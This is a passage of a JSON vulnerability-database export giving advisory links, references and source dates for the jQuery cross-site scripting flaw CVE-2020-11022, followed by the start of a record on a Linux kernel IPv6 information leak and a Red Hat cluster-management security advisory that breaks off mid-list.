"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2020-1519"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2020-130"
},
{
"title": "Tenable Security Advisories: [R1] LCE 6.0.9 Fixes Multiple Third-party Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2021-10"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231049 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 9",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231045 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231043 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 8",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231044 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 for OpenShift image security and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231047 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6.1 image security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204298 - Security Advisory"
},
{
"title": "Geolocation Playground",
"trust": 0.1,
"url": "https://github.com/blaufish/geo "
},
{
"title": "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES",
"trust": 0.1,
"url": "https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022 "
},
{
"title": "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES",
"trust": 0.1,
"url": "https://github.com/korestreet/https-nj.gov---CVE-2020-11022 "
},
{
"title": "AlmostSignificant",
"trust": 0.1,
"url": "https://github.com/bartongroup/AlmostSignificant "
},
{
"title": "Bagel Patch Website\n\nTO DO:",
"trust": 0.1,
"url": "https://github.com/corey-schneider/bagel-shop "
},
{
"title": "JS_Encoder",
"trust": 0.1,
"url": "https://github.com/AssassinUKG/JS_Encoder "
},
{
"title": "XSSPlayground\nWhat is XSS?",
"trust": 0.1,
"url": "https://github.com/AssassinUKG/XSSPlayground "
},
{
"title": "jQuery XSS",
"trust": 0.1,
"url": "https://github.com/EmptyHeart5292/jQuery-XSS "
},
{
"title": "https://github.com/DanielRuf/snyk-js-jquery-565129",
"trust": 0.1,
"url": "https://github.com/DanielRuf/snyk-js-jquery-565129 "
},
{
"title": "CVE-2020-11022 CVE-2020-11023",
"trust": 0.1,
"url": "https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023 "
},
{
"title": "Strings_Attached\nUser Experience\nDevelopment Process\nTesting\nBugs\nLibraries and Programs Used\nDeployment\nCredits\nAcknowledgements",
"trust": 0.1,
"url": "https://github.com/johnrearden/strings_attached "
},
{
"title": "CVEcrystalyer",
"trust": 0.1,
"url": "https://github.com/captcha-n00b/CVEcrystalyer "
},
{
"title": "CVE Sandbox :: jQuery",
"trust": 0.1,
"url": "https://github.com/cve-sandbox/jquery "
},
{
"title": "jQuery \u2014 New Wave JavaScript",
"trust": 0.1,
"url": "https://github.com/spurreiter/jquery "
},
{
"title": "Github Repository Security Alerts",
"trust": 0.1,
"url": "https://github.com/elifesciences/github-repo-security-alerts "
},
{
"title": "Case Study",
"trust": 0.1,
"url": "https://github.com/faizhaffizudin/Case-Study-Hamsa "
},
{
"title": "Retire HTML Parser",
"trust": 0.1,
"url": "https://github.com/marksowell/retire-html-parser "
},
{
"title": "https://github.com/octane23/CASE-STUDY-1",
"trust": 0.1,
"url": "https://github.com/octane23/CASE-STUDY-1 "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/ArrestX/--POC "
},
{
"title": "Normal-POC",
"trust": 0.1,
"url": "https://github.com/Miraitowa70/POC-Notes "
},
{
"title": "Normal-POC",
"trust": 0.1,
"url": "https://github.com/Miraitowa70/Pentest-Notes "
},
{
"title": "Vulnerability",
"trust": 0.1,
"url": "https://github.com/tzwlhack/Vulnerability "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/KayCHENvip/vulnerability-poc "
},
{
"title": "Awesome-POC",
"trust": 0.1,
"url": "https://github.com/Threekiii/Awesome-POC "
},
{
"title": "Welcome to follow the Alpha Lab WeChat official account",
"trust": 0.1,
"url": "https://github.com/alphaSeclab/sec-daily-2020 "
},
{
"title": "SecBooks\nSecBooks Table of Contents",
"trust": 0.1,
"url": "https://github.com/SexyBeast233/SecBooks "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/soosmile/POC "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 1.3,
"url": "https://www.debian.org/security/2020/dsa-4693"
},
{
"trust": 1.3,
"url": "https://security.gentoo.org/glsa/202007-03"
},
{
"trust": 1.2,
"url": "https://github.com/jquery/jquery/security/advisories/ghsa-gxr4-xjj5-5px2"
},
{
"trust": 1.2,
"url": "https://security.netapp.com/advisory/ntap-20200511-0006/"
},
{
"trust": 1.2,
"url": "https://www.drupal.org/sa-core-2020-002"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2020-10"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2020-11"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2021-02"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2021-10"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/162159/jquery-1.2-cross-site-scripting.html"
},
{
"trust": 1.2,
"url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"
},
{
"trust": 1.2,
"url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77"
},
{
"trust": 1.2,
"url": "https://jquery.com/upgrade-guide/3.5/"
},
{
"trust": 1.2,
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.2,
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3ccommits.airflow.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3cdev.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3cissues.flink.apache.org%3e"
},
{
"trust": 0.9,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-055-02"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu94912830/"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu94847990/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99843134/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu94973485/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-097-01"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-342-02"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-182-07"
},
{
"trust": 0.8,
"url": "https://cert.vde.com/en/advisories/vde-2021-027/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-14042"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-14040"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14042"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.4,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11358"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11358"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14040"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:2217"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2015-9251"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-8331"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10735"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-9251"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2016-10735"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3916"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40150"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-40149"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46175"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-45047"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46364"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0091"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3782"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2764"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-46363"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1471"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0264"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1274"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-37603"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-45693"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-38749"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-35065"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1438"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25857"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1274"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@%3ccommits.airflow.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3cdev.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3cissues.flink.apache.org%3e"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/blaufish/geo"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10146"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10179"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1047"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-21843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-37603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-21835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4137"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1043"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1722"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20676"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1722"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20676"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20677"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4670"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20677"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023\u003e"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/glsa/202007-03\u003e"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5\u003e"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14295"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org/\u003e."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258."
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_r"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/ht"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8203"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14333"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "158555"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171215",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159876",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157850",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159275",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-29T00:00:00",
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"date": "2020-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"date": "2020-11-04T15:29:15",
"db": "PACKETSTORM",
"id": "159852",
"ident": null
},
{
"date": "2023-03-02T15:19:44",
"db": "PACKETSTORM",
"id": "171215",
"ident": null
},
{
"date": "2023-03-02T15:19:19",
"db": "PACKETSTORM",
"id": "171212",
"ident": null
},
{
"date": "2020-11-04T15:32:52",
"db": "PACKETSTORM",
"id": "159876",
"ident": null
},
{
"date": "2020-07-27T17:38:33",
"db": "PACKETSTORM",
"id": "158555",
"ident": null
},
{
"date": "2020-05-28T16:07:33",
"db": "PACKETSTORM",
"id": "157850",
"ident": null
},
{
"date": "2020-09-24T00:30:36",
"db": "PACKETSTORM",
"id": "159275",
"ident": null
},
{
"date": "2020-05-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"date": "2020-04-29T22:15:11.903000",
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-07-25T00:00:00",
"db": "VULHUB",
"id": "VHN-163559",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11022",
"ident": null
},
{
"date": "2025-07-03T06:01:00",
"db": "JVNDB",
"id": "JVNDB-2020-004854",
"ident": null
},
{
"date": "2024-11-21T04:56:36.110000",
"db": "NVD",
"id": "CVE-2020-11022",
"ident": null
}
]
},
"title": {
"_id": null,
"data": "jQuery\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code execution, xss, memory leak",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "159876"
}
],
"trust": 0.2
}
}
VAR-202112-2255
Vulnerability from variot - Updated: 2026-03-09 21:48
In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn't properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses. The Linux kernel has a flaw in its use of a cryptographic algorithm. Information may be obtained. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.4.5 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/
Security fixes:
-
golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
-
nconf: Prototype pollution in memory store (CVE-2022-21803)
-
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account (CVE-2022-24450)
-
Moment.js: Path traversal in moment.locale (CVE-2022-24785)
-
dset: Prototype Pollution in dset (CVE-2022-25645)
-
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
-
go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses (CVE-2022-29810)
Bug fixes:
-
Trying to create a new cluster on vSphere and no feedback, stuck in "creating" (BZ# 1937078)
-
Wrong message is displayed when GRC fails to connect to an Ansible Tower (BZ# 2051752)
-
multicluster_operators_hub_subscription issues due to /tmp usage (BZ# 2052702)
-
